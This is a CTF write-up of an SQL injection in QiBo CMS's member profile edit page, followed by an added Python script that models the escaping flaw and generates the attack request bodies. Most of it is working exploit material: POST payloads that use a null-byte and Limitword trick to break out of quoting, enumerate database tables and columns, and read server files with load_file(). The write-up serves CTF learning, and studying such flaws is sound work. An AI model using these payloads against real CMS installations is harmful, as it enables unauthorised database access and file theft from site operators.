ichunqiu CTF - "Baidu Cup" CTF Competition, September Round - Goodbye CMS (再見CMS)

Posted by weixin_34249678 on 2018-11-01

1 Information gathering

When the target is a site built on a CMS, the first step is to identify which CMS it runs. A Baidu search identifies it as the QiBo CMS whole-site system: http://v7.qibosoft.com/


Next, gather information on which vulnerabilities this CMS has had. The relevant one is:

QiBo whole-site / local-portal system SQL injection vulnerability

2 Exploitation

In short, the member profile edit (modifying one's own information) contains an SQL injection. The submitted profile fields are written into an UPDATE statement on the member table; the payload below relies on the truename value xxxx%0000 together with the Limitword[000]= parameter to leave a dangling backslash at the end of the escaped truename, which swallows the closing quote, so the value of the following provinceid field is parsed as SQL.

Following the original researcher's analysis, I wrote payloads to exploit it step by step:

0 - Register a user and note its uid and email address.

1 - Error test:

URL:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email must be the address used at registration
POST data:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid=

2 - Add the injection statement. The injected text turns the rest of the SET clause into ", address=(subquery) where uid = <your uid>" and comments out the remainder with %23 (#), so the subquery result is stored in the address column and can be read back from the profile. Here uid = 3 is the uid of the account registered in step 0; adjust it to your own.

URL:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000]=&email=123456@qq.com&provinceid= , address=(select version()) where uid = 3 %23 

3 - Enumerate tables:

POST data:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23 

4 - Enumerate column names (of the first table in the current database):

POST data:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= 
, address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23 

However, the flag is not in the database, so the remaining option is to read files with load_file().

5 - Payload

A directory scan finds a flag.php in the web root.


Read the file /var/www/html/flag.php with load_file(). The path is passed as a hex literal (0x2f7661722f... is the ASCII encoding of that path), so no quote characters are needed inside the injected value:

truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= 
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23 
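The following is an added example, not code from the original write-up and not QiBo CMS's own code. It models, under explicitly assumed conditions, why the posted fields above become an injection, and it builds the request bodies for steps 2 to 5. The sink is an assumption: each posted profile field is passed through PHP addslashes(), every string named in Limitword[...] is then deleted from it, and the values are written as quoted literals into "UPDATE <prefix>memberdata SET ... WHERE uid". The table name qb_memberdata and the fact that email is checked separately rather than included in the SET list are also assumptions. The mysql_view() helper is a deliberately minimal reading of MySQL's lexer (backslash escapes inside single quotes, # comments) that is enough to show where the quote boundaries end up.

```python
# Added example (not from the write-up or from QiBo CMS). Models the assumed sink:
#   addslashes() -> remove Limitword[] strings -> "UPDATE ... SET col='value', ..."
# and shows why truename=xxxx%0000&Limitword[000]= turns provinceid into SQL.
from urllib.parse import quote, unquote_to_bytes

ASSUMED_TABLE = "qb_memberdata"               # assumption: table prefix "qb_"
ASSUMED_SET_COLUMNS = ["truename", "provinceid"]  # assumption: email is checked elsewhere


def php_addslashes(raw):
    """Mimic PHP addslashes(): prefix ' " \\ with a backslash; NUL becomes the two chars \\0."""
    out = []
    for b in raw:
        if b in b"'\"\\":
            out.append("\\" + chr(b))
        elif b == 0:
            out.append("\\0")
        else:
            out.append(chr(b))
    return "".join(out)


def parse_post_body(body):
    """Split a urlencoded body into profile fields (bytes) and the Limitword[...] names."""
    fields, limitwords = {}, []
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key.startswith("Limitword[") and key.endswith("]"):
            limitwords.append(key[len("Limitword["):-1])
        else:
            fields[key] = unquote_to_bytes(value)
    return fields, limitwords


def render_update(body, uid):
    """SQL text the assumed sink would send for this POST body."""
    fields, limitwords = parse_post_body(body)
    sets = []
    for col in ASSUMED_SET_COLUMNS:
        value = php_addslashes(fields.get(col, b""))
        for word in limitwords:          # the filter deletes the banned word AFTER escaping
            value = value.replace(word, "")
        sets.append(f"{col}='{value}'")
    return f"UPDATE {ASSUMED_TABLE} SET " + ", ".join(sets) + f" WHERE uid='{uid}'"


def mysql_view(sql):
    """Read the statement the way MySQL's lexer would: backslash escapes inside '...',
    '#' starts a comment to end of line. Returns (string literals, code with literals
    replaced by <str> and the comment dropped)."""
    escapes = {"0": "\x00", "n": "\n", "r": "\r", "t": "\t"}
    literals, code, i = [], [], 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            j, buf = i + 1, []
            while j < len(sql) and sql[j] != "'":
                if sql[j] == "\\" and j + 1 < len(sql):
                    buf.append(escapes.get(sql[j + 1], sql[j + 1]))
                    j += 2
                else:
                    buf.append(sql[j])
                    j += 1
            literals.append("".join(buf))
            code.append("<str>")
            i = j + 1
        elif ch == "#":
            break
        else:
            code.append(ch)
            i += 1
    return literals, "".join(code).strip()


def build_body(email, subquery, uid):
    """Request body for steps 2-5: the value of `subquery` is written into `address`."""
    return (f"truename=xxxx%0000&Limitword[000]=&email={quote(email, safe='@.')}"
            f"&provinceid= , address=({subquery}) where uid = {uid} %23 ")


def load_file_subquery(path):
    """load_file() with the path as a hex literal, so no quotes are needed in the value."""
    return "select load_file(0x" + path.encode().hex() + ")"


if __name__ == "__main__":
    # Constructed sample: without Limitword[000] the statement stays well-formed ...
    print(mysql_view(render_update("truename=xxxx%0000&provinceid=foo", 3)))
    # ... with it, '\000' collapses to a lone backslash and provinceid becomes SQL.
    body = build_body("1111@qq.com", load_file_subquery("/var/www/html/flag.php"), 3)
    print(render_update(body, 3))
    print(mysql_view(render_update(body, 3)))
```

Run it and compare the two mysql_view() outputs: in the second, the only string literal MySQL sees is "xxxx', provinceid=", and everything after it up to the # is executed as part of the SET clause, which is exactly the ", address=(...) where uid = 3" fragment used in the steps above.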
